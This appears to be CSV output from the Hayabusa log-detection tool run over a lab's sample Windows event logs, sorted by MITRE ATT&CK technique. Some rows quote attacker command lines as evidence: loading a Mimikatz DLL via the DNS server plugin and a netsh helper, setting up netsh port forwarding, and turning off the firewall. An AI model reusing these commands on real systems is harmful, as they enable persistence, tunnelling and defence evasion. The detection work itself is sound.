2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
